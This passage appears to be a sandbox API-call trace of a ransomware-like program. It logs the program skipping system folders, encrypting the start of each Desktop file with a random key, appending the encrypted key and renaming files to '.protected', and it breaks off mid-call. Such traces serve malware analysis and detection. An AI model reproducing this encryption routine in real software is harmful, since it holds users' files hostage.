1 [0091.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".txt") returned 0x0 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".rar") returned 0x0 [0091.276] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a") returned 54 [0091.276] StrStrW (lpFirst="M MPYvNo.m4a", lpSrch=".zip") returned 0x0 [0091.276] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.277] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.277] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.277] CloseHandle (hObject=0xb4) returned 1 [0091.277] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a.protected") returned 64 [0091.277] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\M MPYvNo.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\m mpyvno.m4a.protected")) returned 1 [0091.278] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.278] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Windows") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Program Files") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="Program Files (x86)") returned -1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="$Recycle.bin") returned 1 [0091.279] lstrcmpiW (lpString1="mudpcd.exe", lpString2="System Volume Information") returned -1 [0091.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe") returned 52 [0091.279] StrStrIW (lpFirst="mudpcd.exe", lpSrch=".protected") returned 0x0 [0091.279] lstrcmpW (lpString1="mudpcd.exe", lpString2="RESTORE_FILES.txt") returned -1 [0091.279] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.279] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mudpcd.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mudpcd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0091.279] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Windows") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Program Files") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="Program Files (x86)") returned -1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="$Recycle.bin") returned 1 [0091.279] lstrcmpiW (lpString1="mZx0.gif", lpString2="System Volume Information") returned -1 [0091.279] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.279] StrStrIW (lpFirst="mZx0.gif", lpSrch=".protected") returned 0x0 [0091.279] lstrcmpW (lpString1="mZx0.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.279] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.279] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".txt") returned 0x0 [0091.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".rar") returned 0x0 [0091.280] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif") returned 50 [0091.280] StrStrW (lpFirst="mZx0.gif", lpSrch=".zip") returned 0x0 [0091.280] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.280] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.280] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.280] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.280] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.281] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.281] CloseHandle (hObject=0xb4) returned 1 [0091.281] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif.protected") returned 60 [0091.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mZx0.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mzx0.gif.protected")) returned 1 [0091.282] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Windows") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Program Files") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="Program Files (x86)") returned -1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="$Recycle.bin") returned 1 [0091.282] lstrcmpiW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="System Volume Information") returned -1 [0091.282] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.282] StrStrIW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".protected") returned 0x0 [0091.282] lstrcmpW (lpString1="njcrT dUf57RZrzRXlE6.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.282] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.282] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".txt") returned 0x0 [0091.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".rar") returned 0x0 [0091.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif") returned 66 [0091.283] StrStrW (lpFirst="njcrT dUf57RZrzRXlE6.gif", lpSrch=".zip") returned 0x0 [0091.283] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.284] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.284] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.284] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.284] CloseHandle (hObject=0xb4) returned 1 [0091.284] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif.protected") returned 76 [0091.284] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\njcrT dUf57RZrzRXlE6.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\njcrt duf57rzrzrxle6.gif.protected")) returned 1 [0091.286] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Windows") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Program Files") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="Program Files (x86)") returned -1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="$Recycle.bin") returned 1 [0091.286] lstrcmpiW (lpString1="nTq0cb2.odp", lpString2="System Volume Information") returned -1 [0091.286] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrIW (lpFirst="nTq0cb2.odp", lpSrch=".protected") returned 0x0 [0091.286] lstrcmpW (lpString1="nTq0cb2.odp", lpString2="RESTORE_FILES.txt") returned -1 [0091.286] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".txt") returned 0x0 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".rar") returned 0x0 [0091.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp") returned 53 [0091.286] StrStrW (lpFirst="nTq0cb2.odp", lpSrch=".zip") returned 0x0 [0091.286] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.287] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.287] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.287] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.287] CloseHandle (hObject=0xb4) returned 1 [0091.287] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp.protected") returned 63 [0091.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nTq0cb2.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ntq0cb2.odp.protected")) returned 1 [0091.288] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Windows") returned -1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Program Files") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="Program Files (x86)") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="$Recycle.bin") returned 1 [0091.288] lstrcmpiW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="System Volume Information") returned -1 [0091.288] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.288] StrStrIW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".protected") returned 0x0 [0091.288] lstrcmpW (lpString1="PVIaNn zCaW2Y8.gif", lpString2="RESTORE_FILES.txt") returned -1 [0091.289] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.289] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".txt") returned 0x0 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".rar") returned 0x0 [0091.289] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif") returned 60 [0091.289] StrStrW (lpFirst="PVIaNn zCaW2Y8.gif", lpSrch=".zip") returned 0x0 [0091.289] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.290] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.290] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.290] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.290] CloseHandle (hObject=0xb4) returned 1 [0091.290] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif.protected") returned 70 [0091.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\PVIaNn zCaW2Y8.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pviann zcaw2y8.gif.protected")) returned 1 [0091.291] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Windows") returned -1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Program Files") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="Program Files (x86)") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="$Recycle.bin") returned 1 [0091.291] lstrcmpiW (lpString1="rsdBWtbO v.mp3", lpString2="System Volume Information") returned -1 [0091.291] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.291] StrStrIW (lpFirst="rsdBWtbO v.mp3", lpSrch=".protected") returned 0x0 [0091.291] lstrcmpW (lpString1="rsdBWtbO v.mp3", lpString2="RESTORE_FILES.txt") returned 1 [0091.291] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.291] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rsdbwtbo v.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".txt") returned 0x0 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".rar") returned 0x0 [0091.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rsdBWtbO v.mp3") returned 56 [0091.292] StrStrW (lpFirst="rsdBWtbO v.mp3", lpSrch=".zip") returned 0x0 [0091.292] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.292] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.293] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.293] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.293] CloseHandle (hObject=0xb4) returned 1 [0091.293] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 